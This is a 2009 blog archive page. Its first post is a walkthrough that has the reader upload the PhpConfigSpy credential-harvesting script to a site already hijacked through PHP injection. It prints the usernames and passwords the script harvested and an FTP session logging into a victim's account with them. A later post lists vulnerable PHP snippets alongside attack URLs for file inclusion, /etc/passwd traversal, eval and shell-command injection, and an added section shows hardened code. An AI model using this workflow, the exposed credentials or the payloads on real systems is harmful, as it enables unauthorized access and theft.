Archive for April, 2009

PhpConfigSpy is a tool that is good at pulling account credentials out of a website, such as the cPanel login, the SSH login (if the target supports SSH) and possibly the database login.
Most of us, after getting a web target (via PHP injection), use it only for bots (Eggdrop, psyBNC). Why not try to get full access to the web target?
Let's try to get some login information from the web target with the PhpConfigSpy tool.
Upload PhpConfigSpy.txt to the web target, then rename the file from .txt to .php. That's all. You can test the tool using a browser (IE, Firefox, Opera, etc.), for example http://www.yourtarget.com/portal/images/phpconfigspy.php.
And this is the result of the scan:

[+] Founded 113 entrys in /etc/passwd
[+] Founded 113 readable public_html directories
[~] Searching for passwords in config.* files…

[+] /home/cofinca/public_html/portal/mambots/editors/fckeditor/editor/filemanager/connectors/php/config.php
ew database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix, $mosConfig
[+] /home/bsidenet/public_html/configuration.php
bside123
[FTP] bsidenet:bside123 Success
[+] /home/gratis/public_html/configuration.php
deko93tg
[FTP] gratis:deko93tg Success

Bingo… Success!
You can check that username via FTP or SSH (if the target supports SSH).
Let's check this login together:
[FTP] bsidenet:bside123 Success
That means user: bsidenet and password: bside123

C:\Documents and Settings\0286061961>ftp alvoaxxxx.pt
Connected to alvoaxxxx.pt.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 04:02. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (alvoaxxxx.pt:(none)): bsidenet
331 User bsidenet OK. Password required
Password:
230-User bsidenet has group access to: bsidenet
230 OK. Current restricted directory is /
ftp> dir
200 PORT command successful
150 Connecting to port 41080
drwx--x--x 8 32137 bsidenet 4096 Mar 26 23:06 .
drwx--x--x 8 32137 bsidenet 4096 Mar 26 23:06 ..
-rw-r--r-- 1 32137 bsidenet 24 Mar 26 23:04 .bash_logout
-rw-r--r-- 1 32137 bsidenet 191 Mar 26 23:04 .bash_profile
-rw-r--r-- 1 32137 bsidenet 124 Mar 26 23:04 .bashrc
-rw-r--r-- 1 32137 bsidenet 19 Mar 26 23:04 .contactemail
drwx------ 2 32137 bsidenet 4096 Apr 23 00:22 .cpanel-datastore
-rw------- 1 32137 bsidenet 14 Apr 23 16:06 .lastlogin
drwxr-xr-x 2 32137 bsidenet 4096 Mar 26 23:04 etc
drwxr-x--- 5 32137 12 4096 Mar 26 23:04 mail
drwxr-xr-x 3 32137 bsidenet 4096 Feb 12 2007 public_ftp
drwxr-x--- 6 32137 99 4096 Apr 23 17:43 public_html
drwxr-xr-x 7 32137 bsidenet 4096 Mar 26 23:22 tmp
lrwxrwxrwx 1 32137 bsidenet 11 Mar 26 23:04 www -> public_html
226-Options: -a -l
226 14 matches total
ftp: 936 bytes received in 0.00Seconds 936000.00Kbytes/sec.
ftp>

It works, bro :D

Multiple Login Yahoo! Messenger

Yahoo Messenger (YM) is one of the most used chat programs. Besides YM, people may use MSN, ICQ, Skype, etc. Here I will give a short tutorial on how to log in to more than one YM account on one computer (just for Yahoo! Messenger).
Let's begin.

1. Run the registry editor: Start Menu -> Run, then type regedit and press Enter.
2. In the left pane of the registry editor, find the key HKEY_CURRENT_USER\Software\Yahoo\Pager\Test
3. In the right pane, right-click and choose New -> DWORD Value
4. Type Plural as the name
5. Double-click Plural and set its value to 1

That's all :D. You can now sign in with 2 Yahoo accounts on 1 computer.

Fatal errors when writing PHP scripts

======case 1======
[scripts]
// Flaw: a request parameter is used as the include path with no validation.
$page = $_GET['page'];
include($page);
[attack]
http://victim.com/file.php?page=[evil scripts]

======case 2======
[scripts]
// Flaw: any file the web server can read is sent back, including PHP source.
header("Content-Type: application/octet-stream");
header("Content-Length: " . filesize($_GET['file']));
header("Content-Disposition: inline; filename=\"$_GET[file]\"");
readfile($_GET['file']);
[attack]

http://victim.com/file.php?file=index.php

======case 3======
[scripts]
// Flaw: the filename is concatenated into the path, so ../ sequences are honoured.
$fp = fopen("/path/{$_GET['filename']}.txt", 'r');
[attack]

http://victim.com/file.php?filename=../../../etc/passwd

======case 4======
[scripts]
// Flaw: request data is executed as PHP code.
eval($_GET['ev']);
[attack]
http://victim.com/file.php?ev=include($_GET[vegetoo]);&vegetoo=[evil code]

======case 5======
[scripts]
// Flaw: request data is executed as a shell command.
passthru($_GET['cmd']);
[attack]
http://victim.com/file.php?cmd=ls -al
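
All five cases share one flaw: a request parameter reaches a dangerous function unchecked. The following is an added example, not code from the original post, showing one way to write cases 1 to 3 safely. It assumes PHP 7.1 or later; the constants, directory names and function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical layout for this example (not from the original post).
const PAGE_DIR = __DIR__ . '/pages';      // templates that may be included
const FILE_DIR = __DIR__ . '/downloads';  // the only directory ever served
const PAGES    = ['home' => 'home.php', 'about' => 'about.php'];

// Case 1: the parameter only selects a key in a fixed allow-list. It is
// never used as a path, so it cannot point at a local or remote file.
function page_path(string $key): string
{
    return PAGE_DIR . '/' . (PAGES[$key] ?? PAGES['home']);
}

// Cases 2 and 3: canonicalise first, then require the result to sit under
// FILE_DIR. realpath() resolves ../ and symlinks and fails on missing files.
function safe_path(string $name): ?string
{
    if ($name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    $root = realpath(FILE_DIR);
    $path = realpath(FILE_DIR . '/' . $name);
    if ($root === false || $path === false || !is_file($path)) {
        return null;
    }
    return strpos($path, $root . DIRECTORY_SEPARATOR) === 0 ? $path : null;
}

function send_download(string $name): void
{
    $path = safe_path($name);
    if ($path === null) {          // outside FILE_DIR, missing, or not a file
        http_response_code(404);
        return;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Length: ' . filesize($path));
    header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
    readfile($path);
}

// Cases 4 and 5 have no hardened form: eval() and passthru() on request data
// are removed, and any needed action becomes a fixed server-side branch.
$file = $_GET['file'] ?? null;
$page = $_GET['page'] ?? 'home';
if (is_string($file)) {
    send_download($file);
} else {
    include page_path(is_string($page) ? $page : 'home');
}
```

Because FILE_DIR holds only downloadable content, a request for index.php or ../../../etc/passwd resolves outside it and gets a 404 instead of the file.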